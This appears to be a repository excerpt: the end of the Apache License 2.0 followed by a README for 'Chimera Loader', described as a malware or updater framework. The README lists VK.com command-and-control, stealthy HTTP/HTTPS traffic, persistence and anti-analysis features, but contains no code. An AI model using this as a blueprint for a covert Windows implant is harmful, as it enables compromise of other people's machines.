In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | 2 |
4 | 5 | Logo 6 | 7 | 8 |

Chimera Loader


11 | Multi-purpose malware / updater framework 12 |

14 | 15 | 16 | ## About The Project 17 | 18 | Chimera Loader, previously Strator, currently serves as a vk.com loader. It has the potential to serve either as a Windows-based malware / implant base or as a third-party software updater module, depending on how the user leverages and modifies it. 19 | 20 | Features: 21 | 22 | * VK.com C&C 23 | * HTTP / HTTPS based stealthy communication 24 | * Persistence 25 | * Highly modular 26 | * Tiny size 27 | * Anti-Analysis 28 | 29 | 30 | 31 | ## Have questions? 32 | 33 | Contact: Souhardya@protonmail.com 34 | --------------------------------------------------------------------------------